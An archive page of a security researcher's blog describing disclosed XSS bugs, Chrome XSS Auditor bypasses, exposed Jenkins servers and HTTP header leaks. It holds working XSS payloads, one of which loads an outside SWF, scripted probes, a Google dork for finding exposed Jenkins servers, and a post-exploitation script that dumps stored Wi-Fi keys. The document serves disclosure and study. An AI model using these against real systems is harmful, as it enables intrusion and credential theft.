Sunday, February 16, 2014

Intel XSS and Google Chrome XSS Auditor Bypass : Application Design Matters! It's True !


Last time, I talked about the role of application design in impacting the state of client-side XSS filters. You can read that blog post here: http://zeroknock.blogspot.com/2013/12/web-application-design-does-matter.html. Building on that hypothesis, another case study came to my notice. I reported a Cross-site Scripting (XSS) bug in the Intel retailer website, and the Intel security team removed the vulnerable web page from its Internet-facing environment. Responsible disclosure is the way to go.

What's the lesson here? Occurrences of XSS vulnerabilities are not new, but the interesting part is how the vulnerable application impacts browser-defined security components such as XSS filters. In this case study, the Google Chrome XSS auditor (enabled by default) again fails to do what it is designed for.

The idea here is not to show that there is an XSS bug in an Intel website, but rather to show that execution of XSS payloads depends on the application design, and there is always unexpected behavior: even sophisticated client-side XSS filters can be bypassed easily. I have not had time to investigate what caused the XSS payload to bypass Chrome's XSS auditor; I will notify the Google Chrome team so that they can look into it.

Proof-of-Concept: I used a very simple payload, JavaScript:alert(document.cookie), in the "URL" parameter of the vulnerable redirect.asp web page.

Injected XSS Payload !

The payload gets embedded as a hyperlink in the web page. Amazingly, the XSS auditor allowed that payload to render, so the XSS injection worked successfully and resulted in cookie extraction.

Successful XSS Injection !
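For anyone probing their own applications for this class of issue, a minimal reflection check is sketched below in Python. The host and parameter handling are placeholders (the vulnerable Intel page has been taken down), so treat this as a sketch rather than a reproduction of the original report.

# Hypothetical sketch: check whether a javascript: URI supplied in a redirect
# parameter is reflected back into the page unencoded. The target URL is a
# placeholder, not the original Intel endpoint.
import requests

target = "http://www.example.com/redirect.asp"   # placeholder
payload = "JavaScript:alert(document.cookie)"

resp = requests.get(target, params={"URL": payload}, timeout=10)

# If the payload comes back unencoded inside an href, the page renders it as a
# hyperlink and the script executes when the link is followed.
if payload in resp.text:
    print("Payload reflected without encoding - likely injectable")
else:
    print("Payload encoded or filtered")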
Keep on trying !

Tuesday, January 07, 2014

Code Nuances (or Bypassing XSS Filters) : Centralops.net Case Study

It is always fun to play around with deployed security mechanisms that are used to subvert application-layer attacks. It is much more interesting to target applications enabled with protections (or that throw code nuances) rather than attacking protection-free applications. A simple case study of centralops.net is presented below.

Acknowledgement: I would like to thank Gavin from Hexillion Group (http://hexillion.com/) for patching this issue within a few hours.

Case Study: While recently working with the Domain Dossier website (http://www.centralops.net) for my ongoing research, I came across an interesting scenario where I had to bypass some glitches in the code (or filter) to execute the XSS code. I wanted to perform link injection with the payload:
"/>&<a href="http://0x.lv/xss.swf"> Injecting SWF Payload </a>
Error due to Injection !

The error I encountered was: "has multiple items separated by spaces, but only one input is allowed at a time. Domain Dossier will continue with"

The error clearly indicates that the input has to be provided as one value, which means the injection payload has to be pushed as a single token. I tried a number of payloads with different meta-characters, all of which produced the same response, until I found the XSS payload that bypassed everything in this scenario. I played around with the whitespace and replaced it with certain characters that allowed me to execute the JavaScript (one could find more payloads, but given the time constraints I was satisfied, since the bypass was already done). Overall it was about ten minutes of game play.

Original : "/><a href="http://0x.lv/xss.swf"> Injecting SWF Payload </a>
Bypass: "/><a//href="http://0x.lv/xss.swf">Injecting_SWF_Payload</a>
Bypass: "/><a/href="http://0x.lv/xss.swf">Injecting_SWF_Payload</a>
Note: I used the "/", "//" and "_" characters so that the payload is treated as one value and pushed through. Browsers treat a stray "/" inside a tag as attribute-separating whitespace, so the anchor still renders as a link while the application's whitespace check sees a single token. As a result, the injection occurs as follows:

Successful Rendering of XSS Payload !
 The supplied payload resulted in successful XSS injection in the target application.

Successful Execution of Payload !
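As a side note, this kind of trial-and-error can be scripted. The sketch below (Python) submits each payload variant to a hypothetical reflection endpoint and reports which ones come back intact; the endpoint and field name are placeholders, not the patched centralops.net form.

# Hypothetical sketch: try whitespace-free payload variants against a field that
# rejects inputs containing spaces, and report which ones are reflected intact.
# The endpoint and parameter name are placeholders.
import requests

endpoint = "http://www.example.com/lookup"   # placeholder
variants = [
    '"/><a href="http://0x.lv/xss.swf"> Injecting SWF Payload </a>',   # original (rejected)
    '"/><a//href="http://0x.lv/xss.swf">Injecting_SWF_Payload</a>',    # bypass
    '"/><a/href="http://0x.lv/xss.swf">Injecting_SWF_Payload</a>',     # bypass
]

for v in variants:
    resp = requests.get(endpoint, params={"addr": v}, timeout=10)
    status = "reflected" if v in resp.text else "filtered"
    print("%-9s %s" % (status, v))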

What do we learn from this?
Over the past years, I have felt it is more important to understand how exactly the attack is executed (analyzing the underlying components). In my experience, one attack vector might not work in all target environments, so we have to build a new one every time. In a number of earlier scenarios, I have seen that if we tamper with the whitespace between HTML attributes and tags, the code fails to render properly in the application. In this case study, however, we are required to embed additional characters in the payload so that it is passed to the application as a single value.

Inference: 

(1) Understand the error and develop appropriate combinations to overcome nuances (or bypass XSS filters).
(2) Design XSS payload as per target environment.

Enjoy !

Wednesday, January 01, 2014

Reported Jenkins Vulnerability Patched by BlackBerry !

A couple of months ago, I discussed the existence of configuration flaws in deployments of the Jenkins software management application. The details are presented here: Jenkins Configuration Issues. Based on the same benchmark, I reported a few vulnerabilities in BlackBerry's infrastructure. Recently, I found that they added my name to the responsible disclosure list here: BlackBerry Responsible Disclosure List, which is fine as long as the team eradicates the vulnerability.

Nowadays, I do not perform aggressive vulnerability hunting (due to my ongoing job), but when I have time, I dissect components of widely used software and try to find flaws in them. I am more interested in cases where companies understand the problem and are ready to patch it; I am not at all inclined towards finding generic issues in websites that nobody cares about. I always believe it is important to understand the consequences associated with an existing vulnerability when it is reported. It is also crucial to determine how an attacker can chain together a set of bugs for greater impact. If we don't understand the nitty-gritty details of the vulnerability, there is a high chance it will resurface.

In this BlackBerry case, unnecessary exposure of a Jenkins component in a production environment could have resulted in problematic scenarios. The exposed Jenkins components were vulnerable to flaws such as injections, XSS, etc. So, the belief is: "Expose Less and Be Secure !"

Note: I am going to report a Frame Injection vulnerability to the Jenkins team so that the issue can be patched. No details for now.

Enjoy !

Sunday, December 29, 2013

Web Application Design Does Matter - Google Chrome XSS Auditor Bypass : Version <= 32.0.1700.41 m Aura !

Update (6th March 2014) : The post is also discussed on Stack Overflow here: https://stackoverflow.com/questions/22202323/bypass-the-chrome-xss-auditor-by-changing-attributes-in-forms, for additional discussion by the users.

Update: The bug has already been reported to the Google Chrome team. The details can be found here: https://code.google.com/p/chromium/issues/detail?id=330972. The team was not able to recreate the issue in their test environment. I validated this issue on the Command and Control (C&C) panel of a botnet :) and I was not in a position to reveal the details of that panel. Anyway, the bug is in "WontFix" state and Google Chrome is still vulnerable to these types of XSS bypasses.

Recently, I encountered an XSS auditor bypass in Google Chrome (<= 32.0.1700.41 m Aura) while working on my research.

Google Chrome Latest Version Tested !
The XSS auditor in Google Chrome is a client-side XSS filter that blocks reflected XSS attacks right away. One point that should be taken into consideration is that the design of the web application can also impact how the XSS auditor works, creating scenarios that are not expected. Anyway, let's analyze a bypass in the latest (and earlier) versions of the Google Chrome browser. The web page URL looks as follows:
http://www.example.com/index.php?m=login which generates the form as follows:

For Injection, we crafted the URL as follows:
http://www.example.com/index.php/" onmouseover="JavaScript:alert(document.location)" name="?m=login . 
In this injection, we have not injected into the "m" parameter; rather, we have played with the URI structure. The idea is to tweak the form layout rather than the value accepted by the "m" parameter. If you place your injection in the "m" parameter, it gets nullified by the XSS auditor. Let's see how the injection occurs:
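To make the behaviour concrete, here is a minimal sketch in Python of the assumed server-side pattern: the page reflects the raw request URI into the form's action attribute without HTML-encoding it, so the injected text escapes the attribute and adds new ones to the form tag. The template below is an assumption for illustration, not the application's actual code.

# Minimal sketch of the assumed server-side behaviour: the raw request URI is
# reflected into the form's action attribute without HTML-encoding.
request_uri = '/index.php/" onmouseover="JavaScript:alert(document.location)" name="?m=login'

form = '<form action="%s" method="post"> ... </form>' % request_uri
print(form)

# Output - the injected text becomes extra attributes on the <form> tag:
# <form action="/index.php/" onmouseover="JavaScript:alert(document.location)"
#       name="?m=login" method="post"> ... </form>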

As a result, Google Chrome XSS auditor is bypassed.

Inference: A few points that should be taken into consideration:

1. The design of a web application impacts the XSS auditor.
2. Instead of always targeting the HTTP parameters, play around with the URI structure as well.

Note: Internet Explorer blocked this vector.

Additional Readings: Check out the inside details of Google Chrome XSS Auditor:
Enjoy !

Sunday, August 25, 2013

CCTV Cameras : An Interview for Fact or Fictional Show : Revision 3!

Recently, I did an interesting interview with Veronica from the Fact or Fictional show on the Internet. We discussed the issues and the technology behind CCTV cameras.


Do not forget to watch the movie on this topic -- "Closed Circuit", starring Eric Bana and Rebecca Hall!



Protect Your Software Development Web Interfaces - Information Lumps: A Case Study of Jenkins !

Automation of software development practices through applications has become the de facto standard in the software industry. Organizations use support applications to reduce the workload of building and updating software. The basic idea behind this post is to check how security is structured for software management applications such as Jenkins in real-world scenarios, and what we need to look at while performing security assessments. Before discussing further, let's talk about Jenkins. According to the software website: "Jenkins is an application that monitors executions of repeated jobs, such as building a software project or jobs run by cron." For more details, you can read here: https://wiki.jenkins-ci.org/display/JENKINS/Meet+Jenkins.

From a software development perspective, Jenkins provides an integrated system that developers can use to manage software changes made to specific projects. It has been noticed that, although organizations use this software, misconfigured interfaces (not running behind a firewall, improper access rights) can have a substantial impact. From a security perspective, exposure of an integrated system that manages the software development model poses a significant risk. To prove this point, a case study of the Jenkins application is discussed, showing how misconfigured and exposed interfaces can result in security glitches.

These tests were conducted in an open environment. Several big companies use Jenkins and, unsurprisingly, their interfaces are exposed and running with improper authentication. In addition, a number of Jenkins systems are Internet-facing and expose a plethora of information to remote attackers. A misconfigured Jenkins server results in disclosure of critical information that can be used in different sets of attacks. A number of misconfiguration issues that result in information disclosure are presented below:

Note: Based on these security issues, a few vulnerabilities have been reported to industry leaders (organizations), which have recognized the issue. I will release the details once the issues are patched.

Developers Information: An exposed Jenkins interface reveals information about the developers participating in the software projects. It is possible to extract the user IDs of registered accounts along with the associated names. This is a substantial starting point for gathering information about the users of a specific organization. An example of the exposed user details is shown below:

Exposed Developers Information !
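A quick way to check whether a Jenkins instance answers such requests anonymously is to hit its JSON API without credentials, as sketched below in Python. The host is a placeholder, and the exact endpoints that leak user details vary by version and configuration.

# Rough sketch: probe a Jenkins instance anonymously and see whether its JSON API
# answers without authentication. The host below is a placeholder.
import requests

base = "http://jenkins.example.com"   # placeholder

resp = requests.get(base + "/api/json", timeout=10)
if resp.status_code == 200:
    data = resp.json()
    print("Anonymous read access is enabled")
    print("Jobs visible without login:", [j.get("name") for j in data.get("jobs", [])])
else:
    print("HTTP %d - anonymous access appears restricted" % resp.status_code)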

Software Builds Information and Source Code: It is possible to gain information about the software builds without any authentication (in misconfigured scenarios). Information about the changes made to the software over time reveals the development flow of its components. The Jenkins application does not validate the user or ask the administrator for explicit permission before the ongoing software builds can be accessed. An example is shown below:

Exposed Software Build and Version numbers !
In certain scenarios, it is also possible to download the source code from Jenkins without any authentication. Although credentials are required to make changes to the code, the fun part is that you can download the code without them. Take a look at the example shown below:

Source Code Files !
Server-side Information Disclosure in Environment Variables: Access to environment variables also provides a plethora of information. The example presented below shows significant information about the configured MySQL (JDBC) database server. The attacker can easily glean the username and password of the database (SONAR_JDBC_USERNAME & SONAR_JDBC_PASSWORD), along with the internal IP address and port number on which the JDBC service is running.

Revealed Environment Information !

Exposure of Application Secret Data: During analysis, it has been found that a number of server-side scripts have critical information such as secret keys and credentials hard-coded, which can be exposed when console-output operations are performed. The highlighted example shows how a secret key is extracted by accessing the console output. In this example, the curl command uses a secret key to connect to a specific domain and fetch JSON data through a GET request. Once this information is exposed, the attacker can directly perform queries against the target domain.

Revealed Secret Key !

Cron Jobs Execution: It is also possible to start cron jobs, which reveal a plethora of information due to the use of debugging calls. Most of the time, cron jobs produce a huge amount of output showing whether the software ran successfully. The example shown below presents the creation of a database by a specific cron job in one of the vulnerable Jenkins configurations. It reveals how the table of OAuth tokens is created and its index is generated.

Information Leakage through Cron Jobs !

Information Disclosure in Debug Errors: During a quick check of certain Jenkins configurations, it was noticed that the Jenkins server does not handle requests to restricted resources in a secure manner. The attacker can request access to restricted resources in order to generate debug errors, as shown below:

Information Disclosure in DEBUG Errors !
Some of the standard requests specific to Jenkins are shown below:
Explicit CSRF Protection: It is always good practice to analyze the design of the application against security standards. Some security protections should be deployed in the application by default. For example, Jenkins provides a global security option in which protection against CSRF attacks has to be explicitly enabled. If this option is not checked, the Jenkins application fails to deploy the protection globally. During our analysis, it was noticed that a number of Jenkins systems are running without CSRF protection, which makes them vulnerable to critical web attacks.

Explicit Security Configuration !
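One rough indicator is the crumb issuer endpoint: when the CSRF option is enabled, Jenkins serves an anti-CSRF crumb from /crumbIssuer/api/json, so an instance that does not expose it is likely running without the protection. A minimal check is sketched below (Python; the host is a placeholder and the interpretation is a heuristic, not a definitive test).

# Rough sketch: check whether a Jenkins instance has its CSRF crumb issuer enabled.
# The host below is a placeholder; treat the result as a heuristic.
import requests

base = "http://jenkins.example.com"   # placeholder

resp = requests.get(base + "/crumbIssuer/api/json", timeout=10)
if resp.status_code == 200:
    print("Crumb issuer present - CSRF protection appears to be enabled")
    print("Crumb request field:", resp.json().get("crumbRequestField"))
else:
    print("No crumb issuer (HTTP %d) - CSRF protection may be disabled" % resp.status_code)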
SSH Endpoint Disclosure: Jenkins implements an SSH random-port feature in which the software randomizes the port selected for the SSH service. Typically, when a client sends a GET request, Jenkins replies with an "X-SSH-Endpoint" HTTP header that leaks this information in the form host:port, meaning the SSH service is listening on the given host and port. If the system is exposed on the Internet, the attacker can easily glean the port number on which the SSH server is listening. A real example of a server running Jenkins is shown below:

SSH Endpoint Disclosure !
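Checking for this leak is a one-request job; a sketch is shown below (Python, placeholder host; which pages carry the header can vary with the Jenkins version and configuration).

# Rough sketch: read the X-SSH-Endpoint header advertised by a Jenkins instance.
# The host below is a placeholder.
import requests

base = "http://jenkins.example.com"   # placeholder

resp = requests.get(base + "/", timeout=10)
endpoint = resp.headers.get("X-SSH-Endpoint")
if endpoint:
    host, port = endpoint.rsplit(":", 1)
    print("SSH service advertised at %s on port %s" % (host, port))
else:
    print("No X-SSH-Endpoint header in the response")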

The information discussed in this post provides only a glimpse of the security risks associated with poorly administered software management applications. These applications can be a rich source of information for attackers about the organization and its server-side environment, which facilitates further attacks.


To replicate these issues, use the Google dork intitle:"Dashboard [Jenkins]" to get a list of Jenkins servers available on the Internet.

Impacts: As shown above, misconfigured software management applications can have severe impacts, as discussed below:
  • Information about developers can be used to conduct phishing attacks, including social engineering trickery to launch targeted attacks.
  • The common mistake of not enabling CSRF protection exposes the Jenkins environment to a number of critical web vulnerabilities such as cross-site file uploading.
  • Inappropriate error handling discloses stack traces and internal components of the software.
  • Unrestricted cron jobs can be triggered to run different builds of the software. As shown above, information disclosed in the console output results in leakage of sensitive data such as secret keys, which the attacker can then use to attack target servers.
  • Disclosure of software build information gives an attacker complete knowledge of the updates and modifications that have taken place in the software. This information is beneficial for hunting security vulnerabilities or for design analysis.


Recommendations:
  • Restrict access to software development and management interfaces completely. It is highly recommended that the server be configured with full authentication, meaning no functionality of the application should be accessible without authentication or in a default state.
  • Simply removing the HTTP links from interfaces is not a robust way to restrict access; the links can be fuzzed easily to reach hidden functionality. Deploy security features using a global configuration.
  • Standard security protection mechanisms should be enabled by default rather than left as a preference for users or administrators.
  • Administrators should verify new account creation in software like Jenkins before access is granted to the registered user.


Configure Well and Be Secure!

Sunday, August 04, 2013

BlackHat USA Arsenal 2013 : Sparty - A FrontPage and SharePoint Security Auditing Tool

Last week, I released the first version of the Sparty tool at BlackHat USA Arsenal 2013. The tool helps penetration testers check for standard security flaws in deployments of FrontPage and SharePoint web software. It is an outcome of the security issues that have been found across wide deployments of this software.

I had an interesting discussion with Tom Gallagher from Microsoft, who worked on FrontPage and SharePoint security and related developments. I got very good feedback, which I will incorporate in the next version. Gursev also provided some impressive points which I will work on.

Sparty is hosted here : http://sparty.secniche.org/

Enjoy and feel free to provide any feedback.

Wednesday, July 17, 2013

Internal IP Address Disclosure over HTTP Protocol Channel : Information Revealing Headers !

The disclosure of internal IP addresses to remote users reveals a substantial amount about the layout of an organization's network. It is strongly advised that web servers should not disclose internal IP addresses in HTTP response headers; in real-world scenarios, however, this is often not the case. Many web servers, load-balancing devices and web applications disclose this information. This post discusses the different ways in which internal IP addresses are revealed over the HTTP protocol.

You can read more about HTTP 1.1 specifications and working here: http://www.w3.org/Protocols/rfc2616/rfc2616-sec14.html

1. Location Response-Header Field: This response header is used to redirect the HTTP client to a new location. It accompanies a 201 response code when a resource is dynamically created during the request, and the 3xx redirection responses (301, 302, 303, 307, etc.), where the location is determined by the web server. If the server builds this value from its internal address rather than its public hostname, the internal IP is leaked to the client.

2. Content-Location: Similarly, the Content-Location response header can also disclose an internal IP address. This header gives the location of the returned resource when it is accessible at a URI separate from the requested one. There is a known issue in IIS web servers that reveal the internal IP address in the Content-Location header while redirecting the browser. More details can be read here: http://www.rapid7.com/vulndb/lookup/http-iis-0065

There is a difference in the usage of the Location and Content-Location HTTP response headers. For reference, you can read this blog entry: http://www.subbu.org/blog/2008/10/location-vs-content-location.

3. Via Header Field: This HTTP header is added by gateways and proxies present between the client (user agent/browser) and the web server. The basic purpose of the Via header field is to track message forwarding, avoid loops during processing and identify protocol capabilities. This header often reveals the internal IP address of the configured gateway or proxy, as shown below:

4. X-Cache Header: This response header is added by transparent proxies deployed as intermediaries between the client and the server. The idea is to reduce the direct load on the website by keeping a copy in the cache and serving it when an HTTP request is initiated by the client. Transparent proxies have other functions as well. The internal IP address can be revealed in the two scenarios discussed below:

4.1 X-Cache Miss: When the transparent proxy does not have a local copy of the website or web pages requested by the client.

4.2 X-Cache Hit: When the transparent proxy has a local copy of the website or requested web pages.

You can read more about the X-Cache headers here: http://anothersysadmin.wordpress.com/2008/04/22/x-cache-and-x-cache-lookup-headers-explained/

5. Set-Cookie Header: A number of load-balancing devices use Set-Cookie to set custom content as part of the communication channel for activating the session with the backend web server. The internal IP address can also be disclosed as part of a Set-Cookie parameter. A simple example is BIG-IP devices, which reveal the internal IP address in binary-encoded form. By default, BIG-IP devices handle HTTP connection pooling based on IP addresses. In the screenshot shown below, the pool parameter holds the value of the internal IP address.

In my earlier presentations (a couple of years ago), I talked about extracting the IP address from the BIG-IP http_pool Set-Cookie parameter. The concept is shown below.
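For reference, the decoding itself takes only a few lines. The Python sketch below decodes the classic BIG-IP persistence cookie format; the sample value is illustrative, not taken from a real device.

# Sketch: decode a classic BIG-IP persistence cookie of the form
# "<ip_as_little-endian_int>.<port_as_little-endian_int>.0000" back into IP:port.
# The sample value below is illustrative only.
import socket
import struct

def decode_bigip_cookie(value):
    ip_enc, port_enc, _ = value.split(".")
    ip = socket.inet_ntoa(struct.pack("<I", int(ip_enc)))             # 32-bit little-endian IP
    port = struct.unpack("<H", struct.pack(">H", int(port_enc)))[0]   # byte-swapped 16-bit port
    return ip, port

print(decode_bigip_cookie("1677787402.36895.0000"))   # -> ('10.1.1.100', 8080)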


These are some of the HTTP headers through which internal IP addresses are exposed. During deployment, one should verify and validate that these headers do not expose unnecessary information.
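A small check that pulls a page and flags the headers discussed above is sketched below in Python. The target is a placeholder and the private-range match is deliberately simplistic.

# Rough sketch: fetch a URL and flag response headers that may carry internal
# (RFC 1918) IP addresses. The target below is a placeholder.
import re
import requests

TARGET = "http://www.example.com/"   # placeholder
HEADERS_OF_INTEREST = ["Location", "Content-Location", "Via", "X-Cache", "Set-Cookie"]
PRIVATE_IP = re.compile(r"\b(10\.\d{1,3}\.\d{1,3}\.\d{1,3}"
                        r"|192\.168\.\d{1,3}\.\d{1,3}"
                        r"|172\.(?:1[6-9]|2\d|3[01])\.\d{1,3}\.\d{1,3})\b")

resp = requests.get(TARGET, allow_redirects=False, timeout=10)
for name in HEADERS_OF_INTEREST:
    value = resp.headers.get(name)
    if not value:
        continue
    flag = "  <-- possible internal IP" if PRIVATE_IP.search(value) else ""
    print("%s: %s%s" % (name, value, flag))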

Note: If anyone has additional information regarding Internal IP address disclosure over HTTP channel, let me know and I will update this entry. The idea is to collect all the metrics.

Enjoy!

Monday, May 20, 2013

Contrarisk Security Podcast Series: A Talk on Socioware!


I recently did a podcast on Socioware with Steve from Contrarisk.

"Microsoft recently warned about Man in the Browser (MitB) malware exploiting Facebook sessions. When a user is infected – often by drive-by downloads on infected or malicious sites – the malware uses authenticated sessions on Facebook to post messages, ‘like’ pages and get up to general mischief."

Listen to the podcast here: http://contrarisk.com/2013/05/19/csp-0011/

Saturday, April 27, 2013

(Pentest Apache #3) - The Nature of # (%23) Character | Mod Security Rules in Apache


In my earlier posts, I talked about some interesting issues in deployed Apache modules and insecure configurations. Refer here:

1. (Pentest Apache #1) Exposed Apache Axis - SOAP Objects
2. (Pentest Apache #2) - The Beauty of "%3F" and Apache's Inability | Wordpress | Mod Security

In this post, I want to discuss an interesting issue that occurs due to misconfigured URL rewriting rules. It is not a severe issue, but it helps the penetration tester gain some additional information about the server-side environment, for example a directory listing.

In Apache's mod_rewrite, NE stands for No Escape. One can explicitly configure rewrite rules with this flag to disable escaping of special characters in the output. For example, "#" will be converted to "%23" if the NE flag is not set; if the NE flag is set, the "#" character is passed through as-is and processed accordingly. For more about rewrite flags, refer here: http://httpd.apache.org/docs/2.2/rewrite/flags.html. An example taken from there:


"RewriteRule ^/anchor/(.+) /bigpage.html#$1 [NE,R]. This example will redirect /anchor/xyz to /bigpage.html#xyz."

If escaping is not set properly, in combination with other misconfiguration issues, it can result in unexpected behavior. I have noticed this flaw a number of times during security assessments. Let's have a look at a real-world example:


URL pattern 1: http://www.example.com/temp/#htaccess.cl
URL pattern 2: http://www.example.com/temp/%23htaccess.cl

In case (1), if the NE flag is set, the URL is processed with the raw "#" character. In case (2), if the NE flag is not set, the URL is processed with "%23", the hexadecimal (URL-encoded) notation of the "#" character. But due to misconfiguration, the behavior changes.

The tested server is Apache/2.2.14. Both URLs returned 200 OK responses. In case (1), the output is a directory listing. In case (2), the output is the content of the file htaccess.cl.

Case 1: Content-Type is text/html;charset=UTF-8


With # Character 
Case 2: Content-Type is text/plain


With %23 Character
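A quick probe that compares the two encodings is sketched below (Python; the host and path are placeholders). Keep in mind that most HTTP clients treat everything after a raw "#" as a fragment and do not send it to the server, which is worth remembering when interpreting case (1).

# Rough sketch: request the same resource with a raw "#" and with its %23 encoding
# and compare the responses. The host and path below are placeholders.
import requests

base = "http://www.example.com/temp/"   # placeholder

for label, url in [("raw #", base + "#htaccess.cl"), ("%23", base + "%23htaccess.cl")]:
    resp = requests.get(url, timeout=10)
    print("%-6s -> HTTP %d, Content-Type: %s, %d bytes"
          % (label, resp.status_code, resp.headers.get("Content-Type", "?"), len(resp.content)))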

One reason could be that the file name starts with the "#" character, but the primary reason is Apache's handling of misconfigured URL rewriting rules. Usually, if a URL rewriting rule fails, the web server should respond with a 404 error message. In the case of misconfiguration, the fallback is a directory listing, at least in the practical scenarios I have seen (it could differ).

Inference: Play around with URL rewriting rules to detect bypasses which could result in gleaning additional information.

Tuesday, April 09, 2013

A Sweet Script to Dump Keys from Wlan Profiles - Post Exploitation (or Regular Use)

Update: Just found that PaulDotCom has covered this blog post in episode 327: http://pauldotcom.com/wiki/index.php/Episode327.

"This is a great example of so many things. First, its a really neat little script (though I imagine the powershell junkies will be excited to convert it). It highlights the importance of post-exploitation. But that is really just a term for us gear heads. What this means for the organization is terrible. It means you can exploit systems that really don't seem to matter, maybe Jane's computer was compromised and didn't have any sensitive data on it and her account does not. However, Jane connects to the same "secure" wireless network as more important people, say Bob from finance. Now, a small little hole, like a missing Adobe patch, just caughed up the keys to your kingdom. It means that vulnerabilities and risk have this weird relationship and its one of the toughest things to understand, until you have a pen test."

After exploitation, retrieving data from the compromised machine is always an interesting scenario. Considering the time factor, even a small amount of automation is productive. Running the same command several times is not bad, but it's better to take the next step.

The script presented below helps dump the security keys for all the WLAN profiles present on the compromised system (if you have administrator access). I use this sweet script to do the work, so use it whenever you want.

Wlan Profiles - Security Keys Dumping Script

It outputs as:



Fetch the batch script from here: http://www.secniche.org/tools/dump_wlan_config.txt
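For reference, a rough Python equivalent of the same netsh-based approach is sketched below. It assumes English-language Windows output for the netsh field names and, like the batch script, needs administrator rights.

# Rough Python equivalent of the batch script: enumerate saved WLAN profiles with
# netsh and print the stored key material for each. Assumes English Windows output
# and administrator rights; runs the same commands the original batch script wraps.
import re
import subprocess

def netsh(args):
    return subprocess.run(["netsh", "wlan"] + args, capture_output=True, text=True).stdout

profiles = re.findall(r"All User Profile\s*:\s*(.+)", netsh(["show", "profiles"]))

for name in profiles:
    name = name.strip()
    detail = netsh(["show", "profile", "name=%s" % name, "key=clear"])
    key = re.search(r"Key Content\s*:\s*(.+)", detail)
    print("%-30s %s" % (name, key.group(1).strip() if key else "<no key stored>"))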

Enjoy !